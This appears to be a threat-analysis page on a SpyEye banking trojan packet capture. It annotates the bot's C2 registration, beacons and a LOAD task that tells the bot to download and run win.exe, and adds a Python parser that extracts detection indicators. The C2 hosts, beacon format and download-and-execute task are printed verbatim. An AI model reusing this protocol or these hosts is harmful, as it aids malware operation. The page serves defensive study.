SpyEye Banking Trojan Malware Traffic Sample PCAP Download

By | January 29, 2016

Download SpyEye Banking Trojan PCAP : spyeye.pcap

Below is a tcpdump -A listing of the capture. The infected host is a Windows XP machine (os_version 5.1.2600, IE 8.0.6001.18702) at 192.168.242.131 running as a VMware guest (the 00:0c:29 OUI in the ARP reply); the capture was taken on 2010-02-13 at 09:23 local time, Eastern Standard Time according to the bot's own report.

Three things to read out of it:

The first conversation, to www.whatsrunning.net, is not SpyEye. A POST to /whatsrunning/CheckNewVersion.aspx with an "Indy Library" User-Agent, a 9-byte body of 3.0.0.966 and an identical 9-byte reply is the self-update check of whatever "whatsrunning" tool was installed on the analysis box. Do not lift that host as an indicator.

The SpyEye check-in starts at 09:23:39. The bot registers with a multipart POST to nazarethimaging.com/grab/websitechk.php carrying bot_guid (USER!HOSTNAME!ID, here SYSTEM!OWNER-CFD98CA45!90F056C2), bot_version 10072, local_time, timezone (sent as UTF-16, which tcpdump prints as E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e.), tick_time, os_version and language_id. Note the absolute URI in the request line although the connection goes straight to the host, not through a proxy. It then beacons with GET /com/bt_version_checker.php?guid=...&stat=ONLINE, the guid now ADMINISTRATOR!OWNER-CFD98CA45!90F056C2 (same hostname and ID, different user context), using the fixed User-Agent string "Microsoft Internet Explorer". The C2 answers with a three-line task: LOAD, a URL, and task id 1137.

The loader then fetches win.exe from www.missboston.org/wp-includes/images/wlw/ (a WordPress site, presumably compromised), gets a 404, and reports back on the same beacon path with stat=LOAD-ERROR&tid=1137&rep=CreateProcess()%20fails, which suggests the 404 body was saved as win.exe and handed to CreateProcess(). The C2 acknowledges with an empty 200.

Two practical notes: the Date headers from nazarethimaging.com run about three minutes ahead of the other servers in the capture, so correlate on capture time rather than on server Date; and the 200 OK replies from the C2 appear twice with identical sequence numbers because the server retransmitted them, not because the bot beaconed twice.

2010-02-13 09:23:18.490261 IP 192.168.242.131.56129 > 192.168.242.2.53: 32546+ A? www.whatsrunning.net. (38)
2010-02-13 09:23:18.575013 ARP, Request who-has 192.168.242.131 tell 192.168.242.2, length 46
2010-02-13 09:23:18.575035 ARP, Reply 192.168.242.131 is-at 00:0c:29:8c:57:d8, length 28
2010-02-13 09:23:18.575271 IP 192.168.242.2.53 > 192.168.242.131.56129: 32546 2/0/0 CNAME whatsrunning.net., A 64.38.48.114 (68)
2010-02-13 09:23:18.595196 IP 192.168.242.131.1390 > 64.38.48.114.80: Flags [S], seq 916714450, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2010-02-13 09:23:18.679275 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [S.], seq 1106594304, ack 916714451, win 64240, options [mss 1460], length 0
2010-02-13 09:23:18.679353 IP 192.168.242.131.1390 > 64.38.48.114.80: Flags [.], ack 1, win 64240, length 0
2010-02-13 09:23:18.680440 IP 192.168.242.131.1390 > 64.38.48.114.80: Flags [P.], seq 1:227, ack 1, win 64240, length 226: HTTP: POST /whatsrunning/CheckNewVersion.aspx HTTP/1.0
POST /whatsrunning/CheckNewVersion.aspx HTTP/1.0
Connection: keep-alive
Content-Length: 9
Host: www.whatsrunning.net
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

2010-02-13 09:23:18.680693 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [.], ack 227, win 64240, length 0
2010-02-13 09:23:18.680765 IP 192.168.242.131.1390 > 64.38.48.114.80: Flags [P.], seq 227:236, ack 1, win 64240, length 9: HTTP
3.0.0.966

2010-02-13 09:23:18.681047 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [.], ack 236, win 64240, length 0
2010-02-13 09:23:19.063111 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [P.], seq 1:330, ack 236, win 64240, length 329: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Connection: keep-alive
Date: Sat, 13 Feb 2010 14:23:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=g1ccax3k5o4xtn3bwgjb4g24; path=/; HttpOnly
Cache-Control: private
Content-Type: text
Content-Length: 9

3.0.0.966

2010-02-13 09:23:19.170327 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [P.], seq 1:330, ack 236, win 64240, length 329: HTTP: HTTP/1.1 200 OK
(retransmission of the previous segment, identical payload)

2010-02-13 09:23:39.455201 IP 192.168.242.131.56563 > 192.168.242.2.53: 43351+ A? nazarethimaging.com. (37)
2010-02-13 09:23:39.543778 IP 192.168.242.2.53 > 192.168.242.131.56563: 43351 1/0/0 A 60.12.117.147 (53)
2010-02-13 09:23:39.545207 IP 192.168.242.131.1391 > 60.12.117.147.80: Flags [S], seq 4097880806, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2010-02-13 09:23:39.841422 IP 60.12.117.147.80 > 192.168.242.131.1391: Flags [S.], seq 765348086, ack 4097880807, win 64240, options [mss 1460], length 0
2010-02-13 09:23:39.841498 IP 192.168.242.131.1391 > 60.12.117.147.80: Flags [.], ack 1, win 64240, length 0
2010-02-13 09:23:39.842860 IP 192.168.242.131.1391 > 60.12.117.147.80: Flags [P.], seq 1:843, ack 1, win 64240, length 842: HTTP: POST http://nazarethimaging.com/grab/websitechk.php HTTP/1.1
POST http://nazarethimaging.com/grab/websitechk.php HTTP/1.1
Host: nazarethimaging.com
Connection: close
Content-Type: multipart/form-data; boundary=55377776816118
Content-Length: 651

--55377776816118
Content-Disposition: form-data; name="bot_guid"

SYSTEM!OWNER-CFD98CA45!90F056C2
--55377776816118
Content-Disposition: form-data; name="bot_version"

10072
--55377776816118
Content-Disposition: form-data; name="local_time"

2010.02.13 09:23:39.169
--55377776816118
Content-Disposition: form-data; name="timezone"

E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e.
--55377776816118
Content-Disposition: form-data; name="tick_time"

0001:06:46
--55377776816118
Content-Disposition: form-data; name="os_version"

5.1.2600
--55377776816118
Content-Disposition: form-data; name="language_id"

1033
--55377776816118--

2010-02-13 09:23:40.129422 IP 60.12.117.147.80 > 192.168.242.131.1391: Flags [P.], seq 1:198, ack 843, win 64240, length 197: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sat, 13 Feb 2010 14:26:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

2010-02-13 09:23:41.322908 IP 192.168.242.131.1392 > 60.12.117.147.80: Flags [P.], seq 1:242, ack 1, win 64240, length 241: HTTP: GET /com/bt_version_checker.php?guid=ADMINISTRATOR!OWNER-CFD98CA45!90F056C2&ver=10072&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=6&ccrc=9038AAB0 HTTP/1.1
GET /com/bt_version_checker.php?guid=ADMINISTRATOR!OWNER-CFD98CA45!90F056C2&ver=10072&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=6&ccrc=9038AAB0 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: www.nazarethimaging.com

2010-02-13 09:23:41.323119 IP 60.12.117.147.80 > 192.168.242.131.1392: Flags [.], ack 242, win 64240, length 0
2010-02-13 09:23:41.689809 IP 60.12.117.147.80 > 192.168.242.131.1392: Flags [P.], seq 1:252, ack 242, win 64240, length 251: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sat, 13 Feb 2010 14:26:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding,User-Agent
Content-Length: 72
Content-Type: text/html

LOAD
http://www.missboston.org/wp-includes/images/wlw/win.exe
1137

2010-02-13 09:23:41.722434 IP 192.168.242.131.60117 > 192.168.242.2.53: 44802+ A? www.missboston.org. (36)
2010-02-13 09:23:41.739602 IP 192.168.242.2.53 > 192.168.242.131.60117: 44802 2/0/0 CNAME missboston.org., A 66.147.242.97 (66)
2010-02-13 09:23:41.847908 IP 192.168.242.131.1393 > 66.147.242.97.80: Flags [P.], seq 1:116, ack 1, win 64240, length 115: HTTP: GET /wp-includes/images/wlw/win.exe HTTP/1.1
GET /wp-includes/images/wlw/win.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: www.missboston.org

2010-02-13 09:23:41.848095 IP 66.147.242.97.80 > 192.168.242.131.1393: Flags [.], ack 116, win 64240, length 0
2010-02-13 09:23:41.944536 IP 66.147.242.97.80 > 192.168.242.131.1393: Flags [P.], seq 1:456, ack 116, win 64240, length 455: HTTP: HTTP/1.1 404 Not Found
HTTP/1.1 404 Not Found
Date: Sat, 13 Feb 2010 14:23:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

af
404 Not Found
404 Not Found
The requested URL /wp-includes/images/wlw/win.exe does not exist.
0

2010-02-13 09:23:43.308833 IP 192.168.242.131.1394 > 60.12.117.147.80: Flags [P.], seq 1:244, ack 1, win 64240, length 243: HTTP: GET /com/bt_version_checker.php?guid=ADMINISTRATOR!OWNER-CFD98CA45!90F056C2&ver=10072&stat=LOAD-ERROR&tid=1137&rep=CreateProcess()%20fails&cpu=3&ccrc=9038AAB0 HTTP/1.1
GET /com/bt_version_checker.php?guid=ADMINISTRATOR!OWNER-CFD98CA45!90F056C2&ver=10072&stat=LOAD-ERROR&tid=1137&rep=CreateProcess()%20fails&cpu=3&ccrc=9038AAB0 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: www.nazarethimaging.com

2010-02-13 09:23:43.309040 IP 60.12.117.147.80 > 192.168.242.131.1394: Flags [.], ack 244, win 64240, length 0
2010-02-13 09:23:43.661768 IP 60.12.117.147.80 > 192.168.242.131.1394: Flags [P.], seq 1:179, ack 244, win 64240, length 178: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sat, 13 Feb 2010 14:26:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html

2010-02-13 09:23:43.761588 IP 60.12.117.147.80 > 192.168.242.131.1394: Flags [P.], seq 1:179, ack 244, win 64240, length 178: HTTP: HTTP/1.1 200 OK
(retransmission of the previous segment, identical payload)
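The script below walks the SpyEye check-in, task and status-report exchanges from the capture above and pulls out the bot identity, the C2 task and the network indicators. It is an added example written for this page, not code from the original post or from the SpyEye kit. The requests it parses are reconstructed inline from the captured payloads (same hosts, paths, field names and values) so that it runs without spyeye.pcap; the Content-Length is recomputed rather than copied from the dump, the timezone field is encoded as UTF-16LE to reproduce the E.a.s.t.e.r.n. rendering, and the task-body layout (command, URL, task id on separate lines) is assumed from the one LOAD task seen here. All function names are this example's own.

```python
"""Parse the SpyEye C2 round trip shown in the capture above.
Added example, not code from the original page or the SpyEye kit.  The requests
are reconstructed from the captured payloads (same hosts, paths, field names and
values) and embedded inline so this runs without spyeye.pcap; Content-Length is
recomputed, not copied.  Function names are this example's own."""
import re
from urllib.parse import parse_qs, urlsplit

BOUNDARY = b"55377776816118"   # boundary from the captured POST; values below copied from it
_FIELDS = [
    (b"bot_guid", b"SYSTEM!OWNER-CFD98CA45!90F056C2"),
    (b"bot_version", b"10072"),
    (b"local_time", b"2010.02.13 09:23:39.169"),
    # tcpdump rendered this one 'E.a.s.t.e.r.n. ...': the bot sends it as UTF-16LE
    (b"timezone", "Eastern Standard Time".encode("utf-16-le")),
    (b"tick_time", b"0001:06:46"),
    (b"os_version", b"5.1.2600"),
    (b"language_id", b"1033"),
]
_BODY = b"".join(
    b'--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n' % (BOUNDARY, n, v)
    for n, v in _FIELDS
) + b"--%s--\r\n" % BOUNDARY
CHECKIN_POST = (
    b"POST http://nazarethimaging.com/grab/websitechk.php HTTP/1.1\r\n"
    b"Host: nazarethimaging.com\r\nConnection: close\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n"
    b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n\r\n" + _BODY
)
TASK_BODY = "LOAD\r\nhttp://www.missboston.org/wp-includes/images/wlw/win.exe\r\n1137\r\n"
STATUS_ERROR = (   # the beacon sent after the LOAD task failed, with its bare User-Agent
    b"GET /com/bt_version_checker.php?guid=ADMINISTRATOR!OWNER-CFD98CA45!90F056C2&ver=10072"
    b"&stat=LOAD-ERROR&tid=1137&rep=CreateProcess()%20fails&cpu=3&ccrc=9038AAB0 HTTP/1.1\r\n"
    b"User-Agent: Microsoft Internet Explorer\r\nHost: www.nazarethimaging.com\r\n\r\n"
)

def parse_request(raw):
    """Split a raw HTTP request into (method, target, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in header_lines)}
    return method, target, headers, body

def parse_multipart(body, boundary):
    """Return {field name: decoded value} for a multipart/form-data body."""
    fields = {}
    for part in body.split(b"--" + boundary):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble / closing delimiter
            continue
        phead, _, pbody = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', phead)
        if m:  # timezone arrives as UTF-16LE ('E.a.s.t.e.r.n.' in the dump); NULs give it away
            fields[m.group(1).decode()] = (pbody.decode("utf-16-le", "replace")
                                           if b"\x00" in pbody else pbody.decode("latin-1"))
    return fields

def split_guid(guid):
    """bot_guid / guid is USER!HOSTNAME!ID, e.g. SYSTEM!OWNER-CFD98CA45!90F056C2."""
    user, host, bot_id = (guid.split("!") + ["", "", ""])[:3]
    return {"bot_user": user, "bot_host": host, "bot_id": bot_id}

def parse_checkin(raw):
    """Registration POST to /grab/websitechk.php with the multipart body."""
    _, target, headers, body = parse_request(raw)
    m = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    fields = parse_multipart(body, m.group(1).encode()) if m else {}
    url = urlsplit(target)   # the bot used an absolute URI although it spoke to the host directly
    return {"c2": url.netloc or headers.get("host", ""), "path": url.path,
            "absolute_uri": bool(url.netloc), "fields": fields,
            **split_guid(fields.get("bot_guid", ""))}

def parse_status(raw):
    """Beacon GET to /com/bt_version_checker.php; every value rides in the query string."""
    _, target, headers, _ = parse_request(raw)
    q = {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}
    q.update(split_guid(q.get("guid", "")), c2=headers.get("host", ""))
    return q

def parse_task(body):
    """C2 reply body: empty means no task; 'LOAD\\n<url>\\n<task id>' means fetch and execute."""
    lines = [ln.strip() for ln in body.splitlines() if ln.strip()]
    if not lines:
        return None
    task = {"cmd": lines[0]}
    if lines[0] == "LOAD" and len(lines) >= 3:
        task["url"], task["tid"] = lines[1], int(lines[2])
    return task

def spyeye_indicators(raw):
    """Traffic features of this sample that a detection rule can key on."""
    method, target, headers, _ = parse_request(raw)
    hits = []
    if headers.get("user-agent") == "Microsoft Internet Explorer":
        hits.append("bare 'Microsoft Internet Explorer' User-Agent")
    if re.search(r"/(bt_version_checker|websitechk)\.php", target):
        hits.append("SpyEye C2 path")
    if method == "POST" and target.startswith("http://"):
        hits.append("absolute-URI request line on a direct connection")
    return hits

if __name__ == "__main__":
    reg, task, err = parse_checkin(CHECKIN_POST), parse_task(TASK_BODY), parse_status(STATUS_ERROR)
    print(reg["bot_user"], reg["bot_host"], reg["fields"]["timezone"], task)
    print(err["stat"], err["tid"], err["rep"], spyeye_indicators(CHECKIN_POST), spyeye_indicators(STATUS_ERROR))
```

Run as a script it prints the registering user and hostname (SYSTEM, OWNER-CFD98CA45), the decoded timezone, the LOAD task with its URL and id 1137, and the LOAD-ERROR report with the "CreateProcess() fails" reason, followed by the indicator hits for each request. The domains and the win.exe URL fall straight out of the parsed structures. Of the three indicators, the exact User-Agent string is the cheapest network signal because it never carries a version, while the two PHP path names are whatever the operator named them and will differ between kits.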
